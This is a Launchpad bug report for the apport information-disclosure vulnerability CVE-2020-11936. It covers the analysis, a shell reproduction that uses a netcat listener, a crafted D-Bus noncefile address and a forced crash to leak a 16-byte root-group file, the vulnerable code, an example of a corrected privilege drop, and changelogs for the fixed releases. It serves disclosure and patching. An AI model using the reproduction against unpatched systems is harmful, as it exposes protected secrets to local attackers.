[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability

Bug #1885633 reported by Steve Beattie
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Apport | Fix Released | Medium | Unassigned | |
| apport (Ubuntu) | Fix Released | Medium | Unassigned | |
| apport (Ubuntu) Xenial | Fix Released | Medium | Unassigned | |
| apport (Ubuntu) Bionic | Fix Released | Medium | Unassigned | |
| apport (Ubuntu) Eoan | Won't Fix | Medium | Unassigned | |
| apport (Ubuntu) Focal | Fix Released | Medium | Unassigned | |

Bug Description

-- VULNERABILITY DETAILS ------------------------
* Version tested: 18.04.4 LTS amd64 server
* Installer file: ubuntu-18.04.4-live-server-amd64.iso
* Platform tested: -

---

### Analysis

Apport, the crash reporter in Ubuntu, executes gdbus to check whether a pid belongs to a user session that is closing. Before executing the binary it drops privileges to the crashed process's uid, but it does not drop the group id, so gdbus still runs with the root group and can be used to leak a file owned by the root group.

As a result, any local user can read a file that is readable only by the root group, with the restriction that the file must be exactly 16 bytes in size (the length of a D-Bus nonce, which gdbus reads from the noncefile named in DBUS_SESSION_BUS_ADDRESS and sends to the bus address).

Reproduction steps:
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH

zdi@ubuntu:/tmp$
```

~~~python
    orig_uid = os.geteuid()
    os.setresuid(-1, os.getuid(), -1)  # <-- drops the effective uid only; egid stays 0
    try:
        # dbus_addr is the DBUS_SESSION_BUS_ADDRESS taken from the crashed
        # process's environment, so the user controls the noncefile= path
        # that gdbus opens, and gdbus opens it with the root group id.
        gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                                  'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
                                  'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
        (out, err) = gdbus.communicate()
        if err:
            error_log('gdbus call error: ' + err.decode('UTF-8'))
    except OSError as e:
        error_log('gdbus call failed, cannot determine running session: ' + str(e))
        return False
    finally:
        os.setresuid(-1, orig_uid, -1)  # switch back; saved uid is still root
~~~
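The added example below is not apport's code. It models which credentials a non-setuid child such as gdbus inherits across execve (saved ids become the effective ids, real ids and supplementary groups are kept) and performs a temporary drop that changes the gid and supplementary groups together with the uid, keeping the saved ids root so the caller can switch back, as the snippet above does for the uid alone. The uid/gid values 1001 and 65534 are constructed.

```python
import os

ROOT = 0

def child_identity(resuid, resgid, groups):
    """Credentials a non-setuid child would run with after execve:
    saved ids are replaced by the effective ids, everything else is kept."""
    ruid, euid, _ = resuid
    rgid, egid, _ = resgid
    return {"ruid": ruid, "euid": euid, "suid": euid,
            "rgid": rgid, "egid": egid, "sgid": egid,
            "groups": tuple(sorted(set(groups)))}

def root_leftovers(resuid, resgid, groups):
    """Slots through which the child could still act as uid 0 or gid 0.
    A real or saved root id lets the child switch back with setuid/setgid;
    an effective root gid or supplementary group 0 passes file permission
    checks on root-group files, which is the leak in this report."""
    ident = child_identity(resuid, resgid, groups)
    left = [s for s in ("ruid", "euid", "suid", "rgid", "egid", "sgid")
            if ident[s] == ROOT]
    if ROOT in ident["groups"]:
        left.append("groups")
    return left

def temp_drop(uid, gid):
    """Drop real and effective uid and gid to the target user, keeping the
    saved ids root for restore_root(). Groups go first: changing them needs
    an effective uid of 0. Refuse to continue if a child would still see root."""
    os.setgroups([gid])
    os.setresgid(gid, gid, -1)
    os.setresuid(uid, uid, -1)
    left = root_leftovers(os.getresuid(), os.getresgid(), os.getgroups())
    if left:
        raise RuntimeError("privilege drop incomplete: " + ", ".join(left))

def restore_root():
    """Undo temp_drop: the saved uid 0 allows setting the effective uid back
    to 0, after which the effective gid can be restored as well."""
    os.setresuid(-1, ROOT, -1)
    os.setresgid(-1, ROOT, -1)

if __name__ == "__main__":
    # Constructed snapshot of the vulnerable state: euid dropped, gids untouched.
    print("child still root via:", root_leftovers((1001, 1001, 0), (0, 0, 0), [0]))
    if os.geteuid() == ROOT:
        temp_drop(65534, 65534)  # assumption: nobody/nogroup on this system
        print("child would see:", child_identity(os.getresuid(), os.getresgid(), os.getgroups()))
        restore_root()
```

Run as root to exercise the real drop; unprivileged, only the constructed snapshot is evaluated.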
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga (@Ga_ryo_) of Flatt Security, working with Trend Micro Zero Day Initiative

Steve Beattie (sbeattie)
description: updated
Steve Beattie (sbeattie) wrote :

Reproduced on focal. Setting the priority to medium due to the requirement that the root group file to be targeted must be exactly 16 bytes in size.

Changed in apport (Ubuntu Focal):
status: New → Confirmed
importance: Undecided → Medium
Changed in apport (Ubuntu Eoan):
importance: Undecided → Medium
Changed in apport (Ubuntu Bionic):
importance: Undecided → Medium
Changed in apport (Ubuntu Xenial):
importance: Undecided → Medium
Changed in apport (Ubuntu):
importance: Undecided → Medium
Steve Beattie (sbeattie) wrote :

Also reproduced in xenial.

Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Bionic):
status: New → Confirmed
Changed in apport (Ubuntu Eoan):
status: New → Confirmed
Steve Beattie (sbeattie) wrote :

This issue has been assigned CVE-2020-11936.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu27.6

---------------
apport (2.20.11-0ubuntu27.6) focal-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)
  * WARNING: This package does _not_ contain the changes from
    2.20.11-0ubuntu27.5 in focal-proposed.

 -- Marc Deslauriers <email address hidden> Fri, 31 Jul 2020 09:10:30 -0400

Changed in apport (Ubuntu Focal):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.1-0ubuntu2.24

---------------
apport (2.20.1-0ubuntu2.24) xenial-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 24 Jul 2020 09:08:40 -0400

Changed in apport (Ubuntu Xenial):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.9-0ubuntu7.16

---------------
apport (2.20.9-0ubuntu7.16) bionic-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 24 Jul 2020 09:08:40 -0400

Changed in apport (Ubuntu Bionic):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu44

---------------
apport (2.20.11-0ubuntu44) groovy; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 31 Jul 2020 09:10:30 -0400

Changed in apport (Ubuntu):
status: New → Fix Released
information type: Private Security → Public Security
Changed in apport (Ubuntu Eoan):
status: Confirmed → Won't Fix
Benjamin Drung (bdrung)
Changed in apport:
status: New → Fix Released
milestone: none → 2.21.0
importance: Undecided → Medium